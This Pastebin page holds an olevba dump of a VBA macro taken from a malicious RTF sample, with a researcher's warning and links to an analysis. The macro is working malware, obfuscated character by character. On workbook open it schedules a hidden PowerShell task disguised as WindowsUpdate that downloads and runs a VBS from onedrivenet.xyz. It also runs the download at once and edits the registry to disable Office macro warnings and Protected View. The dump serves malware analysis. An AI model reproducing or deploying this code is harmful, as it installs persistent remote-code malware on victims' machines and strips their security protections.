Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ' macro extracted from a malicious rtf file (Do not open/run on a production machine):
- ' https://www.hybrid-analysis.com/sample/2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7?environmentId=100
- ' Analysis: https://twitter.com/DissectMalware/status/981766295774531586
- olevba 0.52 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIH--- C:\Users\user\Downloads\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin_object_000A25F5\Package
- ===============================================================================
- FILE: C:\Users\user\Downloads\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin_object_000A25F5\Package
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisWorkbook.cls
- in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub Workbook_Open()
- Set ASdiW834hkjasdDk8 = CreateObject("WScript.Shell")
- Dim ASdiW83ASdjSn1
- Dim ASdiW83ASdjSn2
- Dim ASdiW83ASdjSn3
- Dim ASdiW83ASdjSn4
- Dim ASdiW83ASdjSn5
- Dim ASdiW83ASdjSn6
- Dim ASdiW83ASdjSn7
- ASdiW83ASdjSn1 = "S"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "c"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "h"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "T"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "a"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "k"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s /"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "C"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "r"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "e"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "a"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "t"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "e /"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "c M"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "I"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "N"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "U"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "T"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "E /"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "M"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "O 1 /T"
- ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "N W"
- ASdiW83ASdjSn2 = "i"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "n"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "o"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "w"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "s"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "U"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "p"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "a"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "t"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e /"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "T"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "R ""P"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "o"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "w"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "r"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "s"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "h"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "l"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "l -W H"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "i"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
- ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "n ("
- ASdiW83ASdjSn3 = "N"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "w"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "-"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "O"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "b"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "j"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "c"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t S"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "y"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "s"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "m"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "N"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "et"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "W"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "b"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "C"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "l"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "i"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "n"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & ")"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "D"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "o"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "w"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "n"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "l"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "o"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "a"
- ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "d"
- ASdiW83ASdjSn4 = "F"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "i"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "l"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "e"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "("
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\""http://onedrivenet.xyz/work/19.vbs\"
- ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
- ASdiW83ASdjSn5 = "\"",\"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\""$"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "e"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "n"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & ":"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "p"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "u"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "b"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "l"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "i"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "c"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "c"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "h"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "o"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "t"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "3"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "2"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "5"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "."
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "b"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"")"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & ";"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "("
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "N"
- ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "e"
- ASdiW83ASdjSn6 = "w"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "-"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "O"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "b"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "j"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t -"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "o"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "m S"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "h"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "."
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "A"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "p"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "p"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "i"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "a"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "i"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "o"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "n"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & ")"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "."
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "S"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "h"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "E"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "x"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "u"
- ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t"
- ASdiW83ASdjSn7 = "e"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "("
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\""$"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "e"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "n"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "v"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & ":"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "p"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "u"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "b"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "l"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "i"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "c"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "s"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "v"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "c"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "h"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "o"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "s"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "t"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "3"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "2"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "5"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "."
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "vbs"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"");"" /"
- ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "F "
- ASdiW83ASdjSn200 = ASdiW83ASdjSn1 + ASdiW83ASdjSn2 + ASdiW83ASdjSn3 + ASdiW83ASdjSn4 + ASdiW83ASdjSn5 + ASdiW83ASdjSn6 + ASdiW83ASdjSn7
- ASdiW834hkjasdDk8.Run ASdiW83ASdjSn200, vbHide
- ' ASdiW83ASdjSn200 "SchTasks /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://onedrivenet.xyz/work/19.vbs\\\",\\\"$env:public\svchost325.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost325.vbs\\\");" /F "
- Set FiNoa9L = CreateObject("WScript.Shell")
- Dim FiNSincals3ASdoa9L1
- Dim FiNSincals3ASdoa9L2
- Dim FiNSincals3ASdoa9L3
- Dim FiNSincals3ASdoa9L4
- Dim FiNSincals3ASdoa9L5
- Dim FiNSincals3ASdoa9L6
- Dim FiNSincals3ASdoa9L7
- Dim FiNSincals3ASdoa9L8
- Dim FiNSincals3ASdoa9L9
- Dim FiNSincals3ASdoa9L010
- Dim FiNSincals3ASdoa9L011
- Dim FiNSincals3ASdoa9L012
- Dim FiNSincals3ASdoa9L013
- Dim FiNSincals3ASdoa9L014
- FiNSincals3ASdoa9L1 = "P"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "o"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "w"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "e"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "r"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "S"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "h"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "e"
- FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "l"
- FiNSincals3ASdoa9L2 = "l"
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & " ("
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "N"
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "e"
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "w"
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "-"
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "O"
- FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "b"
- FiNSincals3ASdoa9L3 = "j"
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "e"
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "c"
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "t "
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "S"
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "y"
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "s"
- FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "t"
- FiNSincals3ASdoa9L4 = "e"
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "m"
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "."
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "N"
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "e"
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "t"
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "."
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "W"
- FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "e"
- FiNSincals3ASdoa9L5 = "b"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "C"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "l"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "i"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "e"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "n"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "t"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & ")"
- FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "."
- FiNSincals3ASdoa9L6 = "D"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "o"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "w"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "n"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "l"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "o"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "a"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "d"
- FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "F"
- FiNSincals3ASdoa9L7 = "i"
- FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "l"
- FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "e"
- FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "("
- FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "'http://onedrivenet.xyz/work/19.vbs',"
- FiNSincals3ASdoa9L8 = "'"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "%"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "P"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "u"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "b"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "lic"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "%"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "\"
- FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "s"
- FiNSincals3ASdoa9L9 = "v"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "c"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "h"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "o"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "s"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "t"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "3"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "2"
- FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "."
- FiNSincals3ASdoa9L010 = "v"
- FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "b"
- FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "s"
- FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "'"
- FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & ")"
- FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & ";"
- FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "S"
- FiNSincals3ASdoa9L011 = "t"
- FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "a"
- FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "r"
- FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "t"
- FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "-"
- FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "P"
- FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "r"
- FiNSincals3ASdoa9L012 = "o"
- FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "c"
- FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "e"
- FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "s"
- FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "s"
- FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & " '"
- FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "%"
- FiNSincals3ASdoa9L013 = "P"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "u"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "b"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "lic"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "%"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "\"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "s"
- FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "v"
- FiNSincals3ASdoa9L014 = "c"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "h"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "o"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "s"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "t"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "3"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "2"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "."
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "v"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "b"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "s"
- FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "'"
- FiNSincals3ASdoa9L20 = FiNSincals3ASdoa9L1 + FiNSincals3ASdoa9L2 + FiNSincals3ASdoa9L3 + FiNSincals3ASdoa9L4 + FiNSincals3ASdoa9L5 + FiNSincals3ASdoa9L6 + FiNSincals3ASdoa9L7 + FiNSincals3ASdoa9L8 + FiNSincals3ASdoa9L9 + FiNSincals3ASdoa9L010 + FiNSincals3ASdoa9L011 + FiNSincals3ASdoa9L012 + FiNSincals3ASdoa9L013 + FiNSincals3ASdoa9L014
- FiNoa9L.Run FiNSincals3ASdoa9L20, vbHide
- Set wso = CreateObject("WScript.Shell")
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
